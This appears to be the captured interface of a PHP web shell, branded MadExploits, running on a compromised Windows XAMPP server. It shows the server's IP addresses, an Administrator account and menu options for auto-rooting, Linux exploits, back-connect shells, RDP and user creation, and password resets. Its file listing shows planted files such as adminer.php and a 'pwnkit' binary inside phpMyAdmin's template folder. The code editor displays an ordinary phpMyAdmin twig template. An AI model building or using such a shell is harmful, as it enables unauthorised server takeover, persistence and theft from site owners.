Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
navigation /
tree /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
controls.twig
191
B
-rw-rw-rw-
database_select.twig
837
B
-rw-rw-rw-
fast_filter.twig
860
B
-rw-rw-rw-
node.twig
2.81
KB
-rw-rw-rw-
path.twig
353
B
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
quick_warp.twig
169
B
-rw-rw-rw-
state.twig
217
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : node.twig
{% if show_node %} <li class="{{ li_classes }}"> <div class="block"> <i{{ class == 'first' ? ' class="first"' }}></i> {% if node_is_group %} {{ 'last' not in class ? '<b></b>' }} <a class="{{ link_classes }}" href="#"> <span class="hide paths_nav" data-apath="{{ paths.a_path }}" data-vpath="{{ paths.v_path }}" data-pos="{{ paths.pos }}"></span> {% if pagination_params is not empty %} <span class="hide {{ pagination_params.position }}" data-name="{{ pagination_params.data_name }}" data-value="{{ pagination_params.data_value }}"></span> {% endif %} {{ node_icon|raw }} </a> {% elseif pagination_params is not empty %} <span class="hide {{ pagination_params.position }}" data-name="{{ pagination_params.data_name }}" data-value="{{ pagination_params.data_value }}"></span> {% endif %} </div> {% if node_is_container %} <div class="fst-italic"> {% endif %} {% if node.isGroup %} <div class="block second{{ has_second_icon ? ' double' }}"> <u>{{ get_image(node.icon['image'], node.icon['title']) }}</u> </div> {{ node.name }} {% else %} <div class="block second{{ has_second_icon ? ' double' }}"> {% for link in icon_links %} <a href="{{ url(link.route, link.params) }}"{{ link.is_ajax ? ' class="ajax"' }}> {{- get_image(link.image, link.title) -}} </a> {% endfor %} </div> {% if node_is_container %} <a class="hover_show_full" href="{{ url(text_link.route, text_link.params) }}">{{ node.name }}</a> {% elseif 'index' in node.classes %} <a class="hover_show_full" href="{{ url(text_link.route) }}" data-post="{{ get_common(text_link.params|merge({'is_from_nav': true})) }}" title="{{ text_link.title }}"> {{- node.displayName ?? node.realName -}} </a> {% else %} <a class="hover_show_full{{ text_link.is_ajax ? ' ajax' }}" href="{{ url(text_link.route, text_link.params) }}" title="{{ text_link.title }}"> {{- node.displayName ?? node.realName -}} </a> {% endif %} {% endif %} {{ control_buttons|raw }} {% if node_is_container %} </div> {% endif %} <div class="clearfloat"></div> {% elseif pagination_params is not empty %} <span class="hide {{ pagination_params.position }}" data-name="{{ pagination_params.data_name }}" data-value="{{ pagination_params.data_value }}"></span> {% endif %} {% if recursive.html is not empty and recursive.has_wrapper %} <div class="list_container"{{ recursive.is_hidden ? ' style="display: none;"' }}> <ul> {% endif %} {{ recursive.html|raw }} {% if recursive.html is not empty and recursive.has_wrapper %} </ul> </div> {% endif %} {% if has_siblings %} </li> {% endif %}
Close